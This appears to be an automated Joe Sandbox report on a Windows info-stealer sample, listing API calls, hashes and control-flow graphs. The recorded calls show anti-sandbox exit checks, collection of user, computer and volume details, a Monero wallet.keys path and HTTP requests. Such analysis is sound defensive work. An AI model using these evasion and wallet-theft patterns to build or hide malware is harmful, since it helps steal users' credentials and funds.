                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: d565041be0d9cd8e063be5370c1ef4d34fe89df73c375ffded7969ba03bf9da6
                          • Instruction ID: 2f3aea74984c1f6506f6704cfba2fd2eddb79e71ea2caf1d1bdf6e4e62ed7745
                          • Opcode Fuzzy Hash: d565041be0d9cd8e063be5370c1ef4d34fe89df73c375ffded7969ba03bf9da6
                          • Instruction Fuzzy Hash: 35517EB4A00209EFCB04DFA5D958BBEB7B5BF44704F18805CE816A72C0D770EA85DB62
                          Function 00C07500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 c07500-c0754a GetWindowsDirectoryA 1357 c07553-c075c7 GetVolumeInformationA call c08d00 * 3 1356->1357 1358 c0754c 1356->1358 1365 c075d8-c075df 1357->1365 1358->1357 1366 c075e1-c075fa call c08d00 1365->1366 1367 c075fc-c07617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 c07628-c07658 wsprintfA call c0a740 1367->1368 1369 c07619-c07626 call c0a740 1367->1369 1377 c0767e-c0768e 1368->1377 1369->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C07542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C0757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C0760A
                          • wsprintfA.USER32 ref: 00C07640
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 3502b857db95fd071d3f7769ee1d6c0c186385f963a24860daf741ea021e8349
                          • Instruction ID: 805e6838c6332ac78275172e68387c9ab888a434089ece168a1a33f0abd3b525
                          • Opcode Fuzzy Hash: 3502b857db95fd071d3f7769ee1d6c0c186385f963a24860daf741ea021e8349
                          • Instruction Fuzzy Hash: E941AFB1D04248AFDB14DB94CC49BEEBBB8AF08700F144199F509672C0D7796A88CFA1
                          Function 00C069F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0588), ref: 00C098A1
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E05A0), ref: 00C098BA
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E06C0), ref: 00C098D2
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E05B8), ref: 00C098EA
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0690), ref: 00C09903
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E87F0), ref: 00C0991B
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006D66A0), ref: 00C09933
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006D6A20), ref: 00C0994C
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E05D0), ref: 00C09964
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0768), ref: 00C0997C
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E06D8), ref: 00C09995
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0630), ref: 00C099AD
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006D6680), ref: 00C099C5
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E06F0), ref: 00C099DE
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00BF11D0: ExitProcess.KERNEL32 ref: 00BF1211
                            • Part of subcall function 00BF1160: GetSystemInfo.KERNEL32(?), ref: 00BF116A
                            • Part of subcall function 00BF1160: ExitProcess.KERNEL32 ref: 00BF117E
                            • Part of subcall function 00BF1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BF112B
                            • Part of subcall function 00BF1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BF1132
                            • Part of subcall function 00BF1110: ExitProcess.KERNEL32 ref: 00BF1143
                            • Part of subcall function 00BF1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BF123E
                            • Part of subcall function 00BF1220: ExitProcess.KERNEL32 ref: 00BF1294
                            • Part of subcall function 00C06770: GetUserDefaultLangID.KERNEL32 ref: 00C06774
                            • Part of subcall function 00BF1190: ExitProcess.KERNEL32 ref: 00BF11C6
                            • Part of subcall function 00C07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BF11B7), ref: 00C07880
                            • Part of subcall function 00C07850: RtlAllocateHeap.NTDLL(00000000), ref: 00C07887
                            • Part of subcall function 00C07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C0789F
                            • Part of subcall function 00C078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07910
                            • Part of subcall function 00C078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C07917
                            • Part of subcall function 00C078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C0792F
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00C06AF9
                          • Sleep.KERNEL32(00001770), ref: 00C06B04
                          • CloseHandle.KERNEL32(?,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06B1A
                          • ExitProcess.KERNEL32 ref: 00C06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: d7bb89fa2fe41764f8a32fdbd48f3f0017a8d154423c15018d18c2ebf7aa8602
                          • Instruction ID: e70bb704a793817cf7ce147e4e5ad236d21a092e20c0e8921153374476fcad78
                          • Opcode Fuzzy Hash: d7bb89fa2fe41764f8a32fdbd48f3f0017a8d154423c15018d18c2ebf7aa8602
                          • Instruction Fuzzy Hash: F731F071A10208ABDB04FBF1DC5ABFE7778AF04340F144628F652B61D1DF706A45EAA6
                          Function 00C06AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1436 c06af3 1437 c06b0a 1436->1437 1439 c06aba-c06ad7 call c0aad0 OpenEventA 1437->1439 1440 c06b0c-c06b22 call c06920 call c05b10 CloseHandle ExitProcess 1437->1440 1446 c06af5-c06b04 CloseHandle Sleep 1439->1446 1447 c06ad9-c06af1 call c0aad0 CreateEventA 1439->1447 1446->1437 1447->1440
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00C06AF9
                          • Sleep.KERNEL32(00001770), ref: 00C06B04
                          • CloseHandle.KERNEL32(?,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06B1A
                          • ExitProcess.KERNEL32 ref: 00C06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 03646db8858ccd553846242384c54838c09ded4cc2cab3c5f54092a1cfb8e711
                          • Instruction ID: baf86b2d49356a12d7e7d710661ab1640659be895cde241b950a6d25b99d1b5b
                          • Opcode Fuzzy Hash: 03646db8858ccd553846242384c54838c09ded4cc2cab3c5f54092a1cfb8e711
                          • Instruction Fuzzy Hash: BFF03470A4021AAFEB00AFA19C0ABBE7A34EB04701F144525F653A11D1CBB05684FAAA
                          Function 00BF47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 149d95490d581f8bbebe4880447bc626973eb2c4501372b164331dc204829962
                          • Instruction ID: 59173f98c30378d79cb5270de2dfc5d474286bbeedf1668bcffbee529b5aaa78
                          • Opcode Fuzzy Hash: 149d95490d581f8bbebe4880447bc626973eb2c4501372b164331dc204829962
                          • Instruction Fuzzy Hash: B0213BB1D00208ABDF14DFA5EC4AADD7B78FB44320F108225F965A72D0DB706A0ADF91
                          Function 00C051F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF6280: InternetOpenA.WININET(00C10DFE,00000001,00000000,00000000,00000000), ref: 00BF62E1
                            • Part of subcall function 00BF6280: StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6303
                            • Part of subcall function 00BF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF6335
                            • Part of subcall function 00BF6280: HttpOpenRequestA.WININET(00000000,GET,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF6385
                            • Part of subcall function 00BF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BF63BF
                            • Part of subcall function 00BF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BF63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 1499b8a74bee3c9d4dac275f005bca1684c9755972faf4aa1bd809e87729367b
                          • Instruction ID: d51e0d5135be7111021df5dac66445e16ee554f7e33c2b88922ff13cfe465e0f
                          • Opcode Fuzzy Hash: 1499b8a74bee3c9d4dac275f005bca1684c9755972faf4aa1bd809e87729367b
                          • Instruction Fuzzy Hash: 85115230900208ABDB14FF75DD52EED7378AF50300F408568F91A5B1D2EF34AB09EA91
                          Function 00BF1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1493 bf1220-bf1247 call c089b0 GlobalMemoryStatusEx 1496 bf1249-bf1271 call c0da00 * 2 1493->1496 1497 bf1273-bf127a 1493->1497 1499 bf1281-bf1285 1496->1499 1497->1499 1500 bf129a-bf129d 1499->1500 1501 bf1287 1499->1501 1503 bf1289-bf1290 1501->1503 1504 bf1292-bf1294 ExitProcess 1501->1504 1503->1500 1503->1504
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BF123E
                          • ExitProcess.KERNEL32 ref: 00BF1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 50b4111c9db7c445f7be1b92b3e4a3d6716851109f9e32edce35b02b2a232774
                          • Instruction ID: 79866bc1dafb6ebf64a443dc7c344d3ed37bc0b9fd6add8852785daebda32b52
                          • Opcode Fuzzy Hash: 50b4111c9db7c445f7be1b92b3e4a3d6716851109f9e32edce35b02b2a232774
                          • Instruction Fuzzy Hash: F2014FB094030CEAEB10DFD4CC49BAEBBB8AB04701F248899E705B71C0D77455499B59
                          Function 00BF1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BF112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BF1132
                          • ExitProcess.KERNEL32 ref: 00BF1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 594b3f7dadd9398755d5b5e4032888098b4ac685e6ff17843ce4475ae66e9d71
                          • Instruction ID: 572d6089f85ec26af9ddef0759cd8b712119cbea78972642913fa2a2b51297a2
                          • Opcode Fuzzy Hash: 594b3f7dadd9398755d5b5e4032888098b4ac685e6ff17843ce4475ae66e9d71
                          • Instruction Fuzzy Hash: 1FE0E67094534CFFE7146BA5DC0EB197AB8EB04B01F104495F709771D0D6B526449699
                          Function 00BF10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BF10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BF10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 02395376db9b721b5b5f5ad06a646033d3b901623aa7d0720db504be4fb43b20
                          • Instruction ID: 7e0507bf8e8e5db686724f0eb2d060d4d8a3bb6c5253f09593358e193d060026
                          • Opcode Fuzzy Hash: 02395376db9b721b5b5f5ad06a646033d3b901623aa7d0720db504be4fb43b20
                          • Instruction Fuzzy Hash: BFF0E271641208BBE7149AB8AC4DFBAB7E8E705B15F300858F644E3280D9719E48DAA0
                          Function 00BF1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07910
                            • Part of subcall function 00C078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C07917
                            • Part of subcall function 00C078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C0792F
